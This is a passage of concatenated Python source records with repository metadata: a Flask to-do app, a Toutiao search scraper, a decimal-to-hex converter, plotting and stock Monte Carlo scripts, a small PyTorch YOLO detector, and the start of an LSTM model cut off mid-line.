redirect(url_for('view_list',list_id=1))\n\n@app.route('/lists/')\ndef view_list(list_id):\n return render_template('index.html',\n todos=Todo.query.filter_by(list_id=list_id).order_by('id').all(),\n lists=TodoList.query.order_by('id').all(),\n current_list=TodoList.query.filter_by(id=list_id).order_by('id').first())\n\n@app.route('/lists//create', methods=['POST'])\ndef create_todo(list_id):\n error=False\n data={}\n try:\n desc=request.get_json()['description']\n item=Todo(description=desc,list_id=list_id)\n db.session.add(item)\n db.session.commit()\n data = jsonify({\n 'description': item.description\n })\n except:\n db.session.rollback()\n error=True\n print(sys.exc_info())\n finally:\n db.session.close()\n \n if not error:\n return data\n\n@app.route('/lists/create', methods=['POST'])\ndef create_list():\n error=False\n data={}\n try:\n n=request.get_json()['name']\n list=TodoList(name=n)\n db.session.add(list)\n db.session.commit()\n data = jsonify({\n 'name': list.name,\n 'id': list.id\n })\n except:\n db.session.rollback()\n error=True\n print(sys.exc_info())\n finally:\n db.session.close()\n \n if not error:\n return data\n\n@app.route('/todos//completed', methods=['POST'])\ndef edit_checked(todo_id):\n error=False\n data={}\n try:\n comp=request.get_json()['completed']\n todo_id=todo_id.split('-')[1]\n item=Todo.query.get(todo_id)\n item.completed=comp\n db.session.commit()\n data = jsonify({\n 'completed': item.completed\n })\n except:\n db.session.rollback()\n error=True\n print(sys.exc_info())\n finally:\n db.session.close()\n if not error:\n return data\n\n@app.route('/todos//delete', methods=['POST'])\ndef delete_item(todo_id):\n error=False\n data={}\n try:\n todo_id=todo_id.split('-')[1]\n Todo.query.filter_by(id=todo_id).delete()\n db.session.commit()\n data = jsonify({\n 'deleted': True\n })\n except:\n db.session.rollback()\n error=True\n print(sys.exc_info())\n finally:\n db.session.close()\n if not error:\n return data\n\nif __name__ == \"__main__\":\n app.run(port=5000, debug=True) #host='0.0.0.0' to make app available though the network","repo_name":"omarelsheekh/todoapp","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"1482884616","text":"#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\n'''\n@File : spider.py\n@Time : 2020/07/27 00:49:53\n@Author : Recluse Xu\n@Version : 1.0\n@Contact : 444640050@qq.com\n@Desc : 爬取今日头条搜索结果页信息\n'''\n\n# here put the import lib\nimport requests\nfrom requests.exceptions import RequestException\nimport time\nimport json\n\n\nclass Article(object):\n def __init__(self, title: str, url_toutiao: str, source: str, image_url: str, create_time: str, abstract: str, summary: str):\n self.title = title # 标题\n self.url_toutiao = url_toutiao # 文章链接\n self.source = source # 作者\n self.image_url = image_url # 封面图片url\n self.create_time = create_time # 创建时间\n self.abstract = abstract # 摘要\n self.summary = summary # 总结\n\n def to_dict(self):\n return {\n '标题': self.title,\n '文章链接': self.url_toutiao,\n 'source': self.source,\n '封面图片url': self.image_url,\n '创建时间': self.create_time,\n '摘要': self.abstract,\n '总结': self.summary,\n }\n\n\ndef get_page(keyword: str, offset: int):\n '''\n 获取信息\n '''\n url = 'https://www.toutiao.com/api/search/content/'\n params = {\n 'aid': 24,\n 'app_name': 'web_search',\n 'offset': offset,\n 'format': 'json',\n 'keyword': keyword,\n 'autoload': 'true',\n 'count': 20,\n 'en_qc': 1,\n 'cur_tab': 1,\n 'from': 'search_tab',\n 'pd': 'synthesis',\n }\n try:\n response = requests.get(url, params=params)\n time.sleep(2)\n return response.json()\n except RequestException as e:\n print(e)\n return None\n\n\ndef get_info(info: dict):\n '''\n 获取数据\n '''\n if info['count'] == 0:\n return [], False\n return [Article(\n title=i.get('title'),\n url_toutiao='https://www.toutiao.com/' + i.get('source_url'),\n source=i.get('source'),\n image_url=i.get('image_url'),\n create_time=i.get('datetime'),\n abstract=i.get('abstract'),\n summary=i.get('summary'),\n ) for i in filter(lambda x: x.get('abstract'), info['data'])], True\n\n\ndef crawl_toutiao_search(keyword: str, page: int):\n result = []\n for i in range(20, page*20+1, 20):\n print((i/20)-1, page)\n info_dict = get_page(keyword, i)\n info, have_next_page = get_info(info_dict)\n result.extend(info)\n if not have_next_page:\n break\n return result\n\n\nif __name__ == \"__main__\":\n data = crawl_toutiao_search('python', 10)\n with open('example/简单_今日头条搜索结果/result.json', 'w', encoding='utf-8')as f:\n for arti in data:\n f.write(json.dumps(arti.to_dict(), indent=2, ensure_ascii=False) + '\\n')\n","repo_name":"RecluseXU/learning_spider","sub_path":"example/1_入门_今日头条搜索结果/spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":2879,"program_lang":"python","lang":"en","doc_type":"code","stars":77,"dataset":"github-code","pt":"32"} +{"seq_id":"33801994621","text":"# Convert a decimal to a hex as a string \r\ndef decimalToHex(decimalValue):\r\n hex = \"\"\r\n \r\n while decimalValue != 0:\r\n hexValue = decimalValue % 16 \r\n hex = toHexChar(hexValue) + hex\r\n decimalValue = decimalValue // 16\r\n \r\n return hex\r\n \r\n# Convert an integer to a single hex digit in a character \r\ndef toHexChar(hexValue):\r\n if 0 <= hexValue <= 9:\r\n return chr(hexValue + ord('0'))\r\n else: # 10 <= hexValue <= 15\r\n return chr(hexValue - 10 + ord('A'))\r\n\r\ndef main():\r\n # Prompt the user to enter a decimal integer\r\n decimalValue = eval(input(\"Enter a decimal number: \"))\r\n\r\n print(\"The hex number for decimal\", \r\n decimalValue, \"is\", decimalToHex(decimalValue))\r\n \r\nmain() # Call the main function\r\n","repo_name":"EthanSeaver/Python-Projects","sub_path":"pybook/Decimal2HexConversion.py","file_name":"Decimal2HexConversion.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"32"} +{"seq_id":"16787970492","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport scipy\n\ndef PadeAproximation(x):\n return (x - 7 * x**3 / 60) / (1 + x*x / 20)\n\nsamples = np.linspace(-np.pi / 2, np.pi / 2, 1000)\nvalues1 = np.sin(samples)\nvalues2 = samples\nvalues3 = PadeAproximation(samples)\nvalues4 = abs(values1 - values2)\nvalues5 = abs(values1 - values3)\n\nfig, axs = plt.subplots(5)\nfig.suptitle('Ex 8a, SIN X, X, PADE(X), ERR(SIN X, X), ERR(SIN X, PADE(X))')\naxs[0].plot(samples, values1)\naxs[1].plot(samples, values2)\naxs[2].plot(samples, values3)\naxs[3].plot(samples, values4)\naxs[4].plot(samples, values5)\n\nfor ax in axs.flat:\n ax.set_xlabel('timp')\n ax.set_ylabel('eroare')\n\nplt.savefig('Ex8a.pdf', format='pdf')\n\nplt.show()\n\nvalues4 = np.log(abs(values1 - values2))\nvalues5 = np.log(abs(values1 - values3))\n\nfig, axs = plt.subplots(2)\nfig.suptitle('Ex 8b, Eroarea pe axa OY logaritimica')\naxs[0].plot(samples, values4)\naxs[1].plot(samples, values5)\n\nfor ax in axs.flat:\n ax.set_xlabel('timp')\n ax.set_ylabel('lg(eroare)')\n\nplt.savefig('Ex8b.pdf', format='pdf')\nplt.show()","repo_name":"dimi999/ProcesareSemnale","sub_path":"Lab2/lab2_ex8.py","file_name":"lab2_ex8.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"19464803029","text":"# 开发于 python3,仅需要下面两个第三方依赖,训练的数据为 labelimg 标注型的数据。\n# 依赖 pytorch:(官网找安装方式)开发使用版本为 torch-1.4.0-cp36-cp36m-win_amd64.whl\n# 依赖 opencv: (pip install opencv-contrib-python==3.4.1.15)\n# 其实这里的 opencv 版本不重要,py3能用就行,只是个人喜欢这个版本,因为能用sift图像检测,稳。\n\n\nimport cv2\nimport numpy as np\nimport torch\n\nimport os\nimport math\nimport xml.dom.minidom\n\n# 读取voc格式文件\ndef read_voc_xml(file, islist=True):\n d = xml.dom.minidom.parse(file)\n v = d.getElementsByTagName('annotation')[0]\n f = v.getElementsByTagName('path')[0].firstChild.data\n if not os.path.isfile(f):\n # 如果读取 xml 内的图片文件地址失败,则会在 xml 地址寻对应名字的图片文件再试一次\n # 所以打标的图片文件应该尽量和 voc 格式的xml文件地址放在一起,增加便利\n imgname = os.path.split(f)[-1]\n xmlpath = os.path.split(file)[0]\n f = os.path.join(xmlpath, imgname)\n if not os.path.isfile(f):\n raise 'fail load img: {}'.format(f)\n size = v.getElementsByTagName('size')[0]\n npimg = cv2.imread(f)\n npimg = cv2.cvtColor(npimg, cv2.COLOR_BGR2RGB) # [y,x,c]\n npimg = cv2.resize(npimg, (416, 416))\n npimg_ = np.transpose(npimg, (2,1,0)) # [c,x,y]\n def readobj(obj):\n d = {}\n bbox = obj.getElementsByTagName('bndbox')[0]\n d['width'] = int(size.getElementsByTagName('width')[0].firstChild.data)\n d['height'] = int(size.getElementsByTagName('height')[0].firstChild.data)\n d['ratew'] = rw = d['width']/416\n d['rateh'] = rh = d['height']/416\n d['depth'] = int(size.getElementsByTagName('depth')[0].firstChild.data)\n d['cate'] = obj.getElementsByTagName('name')[0].firstChild.data\n d['xmin'] = int(bbox.getElementsByTagName('xmin')[0].firstChild.data)/rw\n d['ymin'] = int(bbox.getElementsByTagName('ymin')[0].firstChild.data)/rh\n d['xmax'] = int(bbox.getElementsByTagName('xmax')[0].firstChild.data)/rw\n d['ymax'] = int(bbox.getElementsByTagName('ymax')[0].firstChild.data)/rh\n d['w'] = d['xmax'] - d['xmin']\n d['h'] = d['ymax'] - d['ymin']\n d['rect'] = d['xmin'],d['ymin'],d['xmax'],d['ymax']\n d['centerx'] = (d['xmin'] + d['xmax'])/2.\n d['centery'] = (d['ymin'] + d['ymax'])/2.\n d['numpy'] = npimg_\n d['file'] = f\n return d\n if islist: r = [readobj(obj) for obj in v.getElementsByTagName('object')]\n else: r = readobj(v.getElementsByTagName('object')[0])\n return r\n\n# 生成 y_true 用于误差计算\ndef make_y_true(imginfo, S, anchors, class_types):\n def get_max_match_anchor_idx(anchors, bw, bh):\n ious = []\n for aw, ah in anchors:\n mi = min(aw,bw)*min(ah,bh)\n ma = max(aw,bw)*max(ah,bh)\n ious.append(mi/(aw*ah + bw*bh - mi))\n return ious.index(max(ious))\n cx = imginfo['centerx']\n cy = imginfo['centery']\n bw = imginfo['w']\n bh = imginfo['h']\n gap = int(416/S)\n ww = list(range(416))[::int(gap)]\n for wi in range(len(ww)):\n if ww[wi] > cx: \n break\n hh = list(range(416))[::int(gap)]\n for hi in range(len(hh)):\n if hh[hi] > cy: \n break\n wi, hi = wi - 1, hi - 1\n sx, sy = (cx-ww[wi])/gap, (cy-hh[hi])/gap # 用ceil左上角做坐标并进行归一化\n ceillen = (5+len(class_types))\n log = math.log\n z = torch.zeros((S, S, len(anchors)*ceillen))\n indx = get_max_match_anchor_idx(anchors, bw, bh)\n for i, (aw, ah) in enumerate(anchors):\n if i == indx:\n left = i*ceillen\n clz = [0.]*len(class_types)\n clz[class_types.get(imginfo['cate'])] = 1.\n v = torch.FloatTensor([sx, sy, log(bw/aw), log(bh/ah), 1.] + clz)\n z[wi, hi, left:left+ceillen] = v\n return z\n\n# 将经过 backbone 的矩阵数据转换成坐标和分类名字\ndef parse_y_pred(ypred, anchors, class_types, islist=False, threshold=0.2, nms_threshold=0):\n ceillen = 5+len(class_types)\n sigmoid = lambda x:1/(1+math.exp(-x))\n infos = []\n for idx in range(len(anchors)):\n if USE_CUDA:\n a = ypred[:,:,:,4+idx*ceillen].cpu().detach().numpy()\n else:\n a = ypred[:,:,:,4+idx*ceillen].detach().numpy()\n for ii,i in enumerate(a[0]):\n for jj,j in enumerate(i):\n infos.append((ii,jj,idx,sigmoid(j)))\n infos = sorted(infos, key=lambda i:-i[3])\n def get_xyxy_clz_con(info):\n gap = 416/ypred.shape[1]\n x,y,idx,con = info\n gp = idx*ceillen\n contain = torch.sigmoid(ypred[0,x,y,gp+4])\n pred_xy = torch.sigmoid(ypred[0,x,y,gp+0:gp+2])\n pred_wh = ypred[0,x,y,gp+2:gp+4]\n pred_clz = ypred[0,x,y,gp+5:gp+5+len(class_types)]\n if USE_CUDA:\n pred_xy = pred_xy.cpu().detach().numpy()\n pred_wh = pred_wh.cpu().detach().numpy()\n pred_clz = pred_clz.cpu().detach().numpy()\n else:\n pred_xy = pred_xy.detach().numpy()\n pred_wh = pred_wh.detach().numpy()\n pred_clz = pred_clz.detach().numpy()\n exp = math.exp\n cx, cy = map(float, pred_xy)\n rx, ry = (cx + x)*gap, (cy + y)*gap\n rw, rh = map(float, pred_wh)\n rw, rh = exp(rw)*anchors[idx][0], exp(rh)*anchors[idx][1]\n clz_ = list(map(float, pred_clz))\n xx = rx - rw/2\n _x = rx + rw/2\n yy = ry - rh/2\n _y = ry + rh/2\n np.set_printoptions(precision=2, linewidth=200, suppress=True)\n if USE_CUDA:\n log_cons = torch.sigmoid(ypred[:,:,:,gp+4]).cpu().detach().numpy()\n else:\n log_cons = torch.sigmoid(ypred[:,:,:,gp+4]).detach().numpy()\n log_cons = np.transpose(log_cons, (0, 2, 1))\n for key in class_types:\n if clz_.index(max(clz_)) == class_types[key]:\n clz = key\n break\n return [xx, yy, _x, _y], clz, con, log_cons\n def nms(infos):\n if not infos: return infos\n def iou(xyxyA,xyxyB):\n ax1,ay1,ax2,ay2 = xyxyA\n bx1,by1,bx2,by2 = xyxyB\n minx, miny = max(ax1,bx1), max(ay1, by1)\n maxx, maxy = min(ax2,bx2), min(ay2, by2)\n intw, inth = max(maxx-minx, 0), max(maxy-miny, 0)\n areaA = (ax2-ax1)*(ay2-ay1)\n areaB = (bx2-bx1)*(by2-by1)\n areaI = intw*inth\n return areaI/(areaA+areaB-areaI)\n rets = []\n infos = infos[::-1]\n while infos:\n curr = infos.pop()\n if rets and any([iou(r[0], curr[0]) > nms_threshold for r in rets]):\n continue\n rets.append(curr)\n return rets\n if islist:\n v = [get_xyxy_clz_con(i) for i in infos if i[3] > threshold]\n if nms_threshold:\n return nms(v)\n else:\n return v\n else:\n return get_xyxy_clz_con(infos[0])\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.utils.data as Data\nfrom torch.autograd import Variable\nfrom collections import OrderedDict\n\nUSE_CUDA = True if torch.cuda.is_available() else False\nDEVICE = 'cuda' if USE_CUDA else 'cpu'\ntorch.set_printoptions(precision=2, sci_mode=False, linewidth=120, profile='full')\n\nclass Mini(nn.Module):\n class ConvBN(nn.Module):\n def __init__(self, cin, cout, kernel_size=3, stride=1, padding=None):\n super().__init__()\n padding = (kernel_size - 1) // 2 if not padding else padding\n self.conv = nn.Conv2d(cin, cout, kernel_size, stride, padding, bias=False)\n self.bn = nn.BatchNorm2d(cout, momentum=0.01)\n self.relu = nn.LeakyReLU(0.1, inplace=True)\n def forward(self, x): \n return self.relu(self.bn(self.conv(x)))\n def __init__(self, anchors, class_types, inchennel=3):\n super().__init__()\n self.oceil = len(anchors)*(5+len(class_types))\n self.model = nn.Sequential(\n OrderedDict([\n ('ConvBN_0', self.ConvBN(inchennel, 32)),\n ('Pool_0', nn.MaxPool2d(2, 2)),\n ('ConvBN_1', self.ConvBN(32, 48)),\n ('Pool_1', nn.MaxPool2d(2, 2)),\n ('ConvBN_2', self.ConvBN(48, 64)),\n ('Pool_2', nn.MaxPool2d(2, 2)),\n ('ConvBN_3', self.ConvBN(64, 80)),\n ('Pool_3', nn.MaxPool2d(2, 2)),\n ('ConvBN_4', self.ConvBN(80, 96)),\n ('Pool_4', nn.MaxPool2d(2, 2)),\n ('ConvBN_5', self.ConvBN(96, 102)),\n ('ConvEND', nn.Conv2d(102, self.oceil, 1)),\n ])\n )\n def forward(self, x):\n return self.model(x).permute(0,2,3,1)\n\nclass yoloLoss(nn.Module):\n def __init__(self, S, anchors, class_types):\n super(yoloLoss,self).__init__()\n self.S = S\n self.B = len(anchors)\n self.clazlen = len(class_types)\n self.ceillen = (5+self.clazlen)\n self.anchors = torch.FloatTensor(anchors).to(DEVICE)\n\n def get_iou(self,box_pred,box_targ,anchor_idx):\n rate = 416/self.S\n pre_xy = box_pred[...,:2] * rate\n pre_wh_half = torch.exp(box_pred[...,2:4])*self.anchors[anchor_idx]/2\n pre_mins = pre_xy - pre_wh_half\n pre_maxs = pre_xy + pre_wh_half\n true_xy = box_targ[...,:2] * rate\n true_wh_half = torch.exp(box_targ[...,2:4])*self.anchors[anchor_idx]/2\n true_mins = true_xy - true_wh_half\n true_maxs = true_xy + true_wh_half\n\n inter_mins = torch.max(true_mins, pre_mins)\n inter_maxs = torch.min(true_maxs, pre_maxs)\n inter_wh = torch.max(inter_maxs - inter_mins, torch.FloatTensor([0.]).to(DEVICE))\n inter_area = inter_wh[...,0] * inter_wh[...,1]\n ture_area = torch.exp(box_pred[...,2])*self.anchors[anchor_idx][0] * torch.exp(box_pred[...,3])*self.anchors[anchor_idx][1]\n pred_area = torch.exp(box_targ[...,2])*self.anchors[anchor_idx][0] * torch.exp(box_targ[...,3])*self.anchors[anchor_idx][1]\n ious = inter_area/(ture_area+pred_area-inter_area)\n return ious\n\n def forward(self,predict_tensor,target_tensor,callback=None):\n N = predict_tensor.size()[0]\n box_contain_loss = 0\n noo_contain_loss = 0\n locxy_loss = 0\n locwh_loss = 0\n loc_loss = 0\n class_loss = 0\n for idx in range(self.B):\n targ_tensor = target_tensor [:,:,:,idx*self.ceillen:(idx+1)*self.ceillen]\n pred_tensor = predict_tensor[:,:,:,idx*self.ceillen:(idx+1)*self.ceillen]\n coo_mask = (targ_tensor[:,:,:,4] > 0).unsqueeze(-1).expand_as(targ_tensor)\n noo_mask = (targ_tensor[:,:,:,4] == 0).unsqueeze(-1).expand_as(targ_tensor)\n if not torch.any(coo_mask): \n noo_pred = pred_tensor[noo_mask].view(-1,self.ceillen)\n noo_targ = targ_tensor[noo_mask].view(-1,self.ceillen)\n noo_contain_loss += F.mse_loss(torch.sigmoid(noo_pred[...,4]), noo_targ[...,4],reduction='sum')*.1\n else:\n coo_pred = pred_tensor[coo_mask].view(-1,self.ceillen)\n coo_targ = targ_tensor[coo_mask].view(-1,self.ceillen)\n noo_pred = pred_tensor[noo_mask].view(-1,self.ceillen)\n noo_targ = targ_tensor[noo_mask].view(-1,self.ceillen)\n\n box_pred = coo_pred[...,0:5].contiguous().view(-1,5)\n box_targ = coo_targ[...,0:5].contiguous().view(-1,5)\n class_pred = coo_pred[...,5:5+self.clazlen]\n class_targ = coo_targ[...,5:5+self.clazlen]\n\n box_pred[...,:2] = torch.sigmoid(box_pred[...,:2])\n ious = self.get_iou(box_pred,box_targ,idx)\n box_contain_loss += F.mse_loss(torch.sigmoid(box_pred[...,4])*ious, box_targ[...,4],reduction='sum')\n noo_contain_loss += F.mse_loss(torch.sigmoid(noo_pred[...,4]), noo_targ[...,4],reduction='sum')*.1\n locxy_loss += F.mse_loss(box_pred[...,0:2], box_targ[...,0:2],reduction='sum')\n locwh_loss += F.mse_loss(box_pred[...,2:4], box_targ[...,2:4],reduction='sum')\n loc_loss += locxy_loss + locwh_loss\n class_loss += F.mse_loss(class_pred,class_targ,reduction='sum')\n # print('[ ious ] :', ious)\n all_loss = (box_contain_loss + noo_contain_loss + loc_loss + class_loss)/N/self.B\n global print\n print = callback if callback else print\n print(\n '[ loss ] (con|non){:>.3f}|{:>.3f},(xy|wh){:>.3f}|{:>.3f},(class){:>.3f},(all){:>.3f}.'.format(\n box_contain_loss.item(), noo_contain_loss.item(), locxy_loss.item(),\n locwh_loss.item(), class_loss.item(), all_loss.item(),\n )\n )\n return all_loss\n\ndef train(train_data, anchors, class_types):\n EPOCH = 1000\n BATCH_SIZE = 4\n LR = 0.001\n train_loader = Data.DataLoader(\n dataset = train_data,\n batch_size = BATCH_SIZE,\n shuffle = True,\n )\n try:\n state = torch.load('net.pkl')\n net = Mini(anchors, class_types)\n net.load_state_dict(state['net'])\n net.to(DEVICE)\n optimizer = state['optimizer']\n epoch = state['epoch']\n print('load train.')\n except:\n import traceback\n excp = traceback.format_exc()\n if 'FileNotFoundError' not in excp:\n print(traceback.format_exc())\n net = Mini(anchors, class_types)\n net.to(DEVICE)\n optimizer = torch.optim.Adam(net.parameters(), lr=LR)\n epoch = 0\n print('new train.')\n yloss = yoloLoss(13, anchors=anchors, class_types=class_types, )\n net.train()\n for epoch in range(epoch, epoch+EPOCH):\n print('epoch', epoch)\n for step, (x_true_, y_true_) in enumerate(train_loader):\n print('[{:<3}]'.format(step), end='')\n x_true = Variable(x_true_).to(DEVICE)\n y_true = Variable(y_true_).to(DEVICE)\n output = net(x_true)\n loss = yloss(output, y_true)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n state = {'net':net.state_dict(), 'optimizer':optimizer, 'epoch':epoch+1, \n 'anchors':anchors, 'class_types':class_types}\n torch.save(state, 'net.pkl')\n print('save.')\n print('end.')\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\ndef drawrect(img, rect, text):\n cv2.rectangle(img, tuple(rect[:2]), tuple(rect[2:]), (10,250,10), 2, 1)\n x, y = rect[:2]\n def cv2ImgAddText(img, text, left, top, textColor=(0, 255, 0), textSize=20):\n from PIL import Image, ImageDraw, ImageFont\n img = Image.fromarray(cv2.cvtColor(img, cv2.COLOR_BGR2RGB))\n draw = ImageDraw.Draw(img)\n fontText = ImageFont.truetype( \"font/simsun.ttc\", textSize, encoding=\"utf-8\")\n draw.text((left, top), text, textColor, font=fontText)\n return cv2.cvtColor(np.asarray(img), cv2.COLOR_RGB2BGR)\n import re\n if re.findall('[\\u4e00-\\u9fa5]', text):\n img = cv2ImgAddText(img, text, x, y-12, (10,10,250), 12) # 如果存在中文则使用这种方式绘制文字\n else:\n cv2.putText(img, text, (x,y), cv2.FONT_HERSHEY_SIMPLEX, 0.4, (10,10,250), 1)\n return img\ndef get_all_draw_rects(filename, state):\n net = state['net']\n anchors = state['anchors']\n class_types = state['class_types']\n npimg = cv2.imread(filename)\n height, width = npimg.shape[:2]\n npimg = cv2.cvtColor(npimg, cv2.COLOR_BGR2RGB) # [y,x,c]\n npimg = cv2.resize(npimg, (416, 416))\n npimg_ = np.transpose(npimg, (2,1,0)) # [c,x,y]\n y_pred = net(torch.FloatTensor(npimg_).unsqueeze(0).to(DEVICE))\n v = parse_y_pred(y_pred, anchors, class_types, islist=True, threshold=0.2, nms_threshold=0.4)\n r = []\n for i in v:\n rect, clz, con, log_cons = i\n rw, rh = width/416, height/416\n rect[0],rect[2] = int(rect[0]*rw),int(rect[2]*rw)\n rect[1],rect[3] = int(rect[1]*rh),int(rect[3]*rh)\n r.append([rect, clz, con, log_cons])\n # 绘制所有定位的框\n img = cv2.imread(filename)\n for i in r:\n rect, clz, con, log_cons = i\n img = drawrect(img, rect, '{}|{:<.2f}'.format(clz,con))\n cv2.imshow('test', img)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\ndef load_net(filename):\n state = torch.load(filename)\n anchors = state['anchors']\n class_types = state['class_types']\n net = Mini(anchors, class_types)\n net.load_state_dict(state['net'])\n net.to(DEVICE)\n net.eval()\n state['net'] = net\n return state\n\n\n\n\n\n\n\ndef load_voc_data(xmlpath, anchors):\n files = [os.path.join(xmlpath, path) for path in os.listdir(xmlpath) if path.endswith('.xml')]\n imginfos = []\n print('use anchors:', anchors)\n print('load xml file number:{}, start.'.format(len(files)))\n for idx, file in enumerate(files):\n if idx % 1000 == 0: print('loading {}/{}'.format(idx, len(files)))\n imginfos.extend(read_voc_xml(file, islist=True))\n print('load all file. ok.')\n # 注意这里加载数据的方式是小批量加载处理,所以自动生成 class_types\n # 如果有大量数据想要进行多批次训练,那么就需要注意 class_types 的生成。\n class_types = [imginfo.get('cate') for imginfo in imginfos]\n print('load class types. start.')\n class_types = {typ:idx for idx,typ in enumerate(sorted(list(set(class_types))))}\n print('load class types. ok.')\n print('class_types:', class_types)\n train_data = []\n print('make x_true,y_true. start.')\n for idx, imginfo in enumerate(imginfos):\n if idx % 1000 == 0: print('makeing x_true,y_true. {}/{}'.format(idx, len(files)))\n x_true = torch.FloatTensor(imginfo['numpy'])\n y_true = make_y_true(imginfo, 13, anchors, class_types)\n train_data.append([x_true, y_true])\n print('make x_true,y_true. ok.')\n return train_data, imginfos, class_types\n\n\n\n\n\n\n\n\n\n\n\n# 加载数据,生成训练数据的结构,主要需要的三个数据 anchors,class_types,train_data\n# 训练结束后会将 anchors, class_types 信息一并存放,所以预测时无需重新加载数据获取这两项信息\n# 如果存在之前的训练文件,会自动加载进行继续训练,并且保存时会覆盖之前的模型\n# 另外这里的 anchor 数量可以自由调整,如果所定位的形状没有太大变化,设置成一个 [[60, 60]] 会节约计算资源\nif __name__ == '__main__':\n xmlpath = './train_img'\n anchors = [[60, 60]]\n train_data, imginfos, class_types = load_voc_data(xmlpath, anchors)\n train(train_data, anchors, class_types)\n\n # testpath = './train_img'\n # state = load_net('net.pkl')\n # v = [os.path.join(testpath, i) for i in os.listdir(testpath) if i.lower().endswith('.jpg') or i.lower().endswith('.png')]\n # v = v[::-1]\n # for i in v:\n # get_all_draw_rects(i, state)\n\n","repo_name":"cilame/any-whim","sub_path":"learn_torch/mini_yolo.py","file_name":"mini_yolo.py","file_ext":"py","file_size_in_byte":19205,"program_lang":"python","lang":"en","doc_type":"code","stars":128,"dataset":"github-code","pt":"32"} +{"seq_id":"1284881787","text":"# coding:utf-8\nimport sys\nimport pandas as pd\nimport numpy as np\nfrom datetime import datetime\nimport csv\nimport random\nimport math\n\n'''\n第一引数:証券コード 第二引数:何日後か 第三引数:何通り導き出すか\npython japan_stock.py 7203 365 1000\n'''\n\nbase = 'http://info.finance.yahoo.co.jp/history/?code={0}.T&{1}&{2}&tm={3}&p={4}'\ncode = int(sys.argv[1])\nendTime = datetime.now()\nstartTime = datetime(endTime.year - 1, endTime.month, endTime.day)\nstart = 'sy={0}&sm={1}&sd={2}'.format(startTime.year, startTime.month, startTime.day)\nend = 'ey={0}&em={1}&ed={2}'.format(endTime.year, endTime.month, endTime.day)\ninterval = 'd'\np = 1\nresults = []\n\n#過去一年間のデータ取得\nwhile True:\n url = base.format(code, start, end, interval, p)\n tables = pd.read_html(url, header=0)\n if len(tables) < 2 or len(tables[1]) == 0:\n break\n results.append(tables[1])\n p += 1\nresult = pd.concat(results, ignore_index=True)\n\n#以下解析\nresult.columns = ['Date', 'Open', 'High', 'Low', 'Close', 'Volume', 'Adj Close']\nadj_close_rate = result['Adj Close'].pct_change()\nrets = adj_close_rate.dropna()\n\ndef stock_montecarlo(startPrice, days, mu, sigma):\n price = np.zeros(days)\n price[0] = startPrice\n drift = mu/days\n for x in range(1,days):\n shock = random.uniform(-1,1) * sigma/math.sqrt(days)\n price[x] = price[x-1] + (price[x-1] * (drift + shock))\n return price\n\nstartPrice = result['Adj Close'].iloc[0]\ndays = int(sys.argv[2])\nmu = rets.mean()\nsigma = rets.std()\nruns = int(sys.argv[3])\nsimulationSave = np.zeros([runs,days])\n\nfor run in range(1,runs):\n stack = stock_montecarlo(startPrice, days, mu, sigma)\n for day in range(1,days):\n simulationSave[run][day] = stack[day - 1]\n\nresult = np.zeros(days)\nfor day in range(1,days):\n\tfor run in range(1,runs):\n\t\tresult[day - 1] += simulationSave[run][day]\n\tresult[day - 1] = result[day - 1]/runs\n\n\n#結果出力 columns出力\n#demo = pd.DataFrame(simulationSave)\n#demo.to_csv('result.csv')\n\ndemo = pd.DataFrame(result)\ndemo.to_csv('result.csv')\n","repo_name":"jphacks-official/KS_1601","sub_path":"scripts/python_stockAnalize/japan_sock.py","file_name":"japan_sock.py","file_ext":"py","file_size_in_byte":2082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"11180393976","text":"import torch\nfrom torch import nn\nfrom torch.nn import functional as F\nfrom models.layers import GraphConv\nfrom utils.config import args\n\n\nclass LSTM(nn.Module):\n def __init__(self, input_size=48, hidden_dim=16, seq_len=140, num_layers=1,\n output_size=2):\n super().__init__()\n self.hidden_layer_size = hidden_dim\n\n self.lstm_1 = nn.LSTM(input_size, hidden_dim, num_layers, batch_first=True)\n self.lstm_2 = nn.LSTM(hidden_dim, 2, num_layers, batch_first=True)\n # self.lstm = tnn.LSTM(embedding_dim,hidden_dim,n_layer,dropout=drop_prob,batch_first=True,bidirectional=True,bias=True)\n\n self.linear = nn.Linear(seq_len*2, output_size)\n\n # self.hidden_cell = (torch.zeros(num_layers, 1, self.hidden_layer_size),\n # torch.zeros(num_layers, 1, self.hidden_layer_size))\n\n # self.log_softmax = nn.LogSoftmax(dim=1)\n self.CONV = nn.Sequential(\n nn.Conv1d(hidden_dim, hidden_dim, kernel_size=2, padding=3),\n nn.ReLU(),\n nn.MaxPool1d(10)\n # nn.BatchNorm1d(hidden_layer_size)\n )\n self.sig = nn.Sigmoid()\n\n def forward(self, input_seq):\n ### 2 layer LSTM\n # lstm_out, (h, c) = self.lstm_1(input_seq)\n lstm_out, _ = self.lstm_1(input_seq)\n lstm_out_1, _ = self.lstm_2(lstm_out)\n # lstm_out, self.hidden_cell = self.lstm(input_seq.view(len(input_seq), 1, -1), self.hidden_cell)\n # Batch size\n # output, _ = torch.max(lstm_out, 1)\n # print(f\"lstm_out shape {lstm_out.shape}\")\n # print(f\"lstm_out_1 shape {lstm_out_1.shape}\")\n # lstm_out = lstm_out.permute(0, 2, 1)\n # output = self.CONV(lstm_out)\n # print(f\"output shape {output.shape}\")\n output = []\n output = lstm_out_1.reshape(len(input_seq), -1)\n output = self.linear(output)\n output = self.sig(output)\n # output, _ = torch.max(lstm_out, 1)\n ##### CNN LSTM\n # lstm_out, (h, c) = self.lstm_1(input_seq)\n # lstm_out = lstm_out.permute(0, 2, 1)\n # output = self.CONV(lstm_out)\n # output = torch.max(output, 